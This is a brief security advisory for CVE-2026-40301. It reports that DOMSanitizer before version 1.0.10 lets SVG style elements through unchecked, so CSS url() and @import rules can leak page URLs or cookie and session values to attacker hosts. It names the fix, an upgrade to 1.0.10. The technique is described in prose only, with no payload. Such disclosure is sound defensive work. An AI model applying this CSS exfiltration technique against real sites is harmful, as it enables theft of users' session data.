CVE-2026-40301

Name of the Vulnerable Software and Affected Versions DOMSanitizer versions prior to 1.0.10

Description The sanitize() function allows style elements in SVG content without inspecting their text content. This allows CSS url() references and @import rules to pass through unfiltered, which can cause a browser to issue HTTP requests to attacker-controlled hosts when the sanitized SVG is rendered. An attacker can use this to exfiltrate the page URL to an external server, load arbitrary external stylesheets, or potentially exfiltrate cookie or session token values using CSS attribute selectors.

Recommendations Update to version 1.0.10.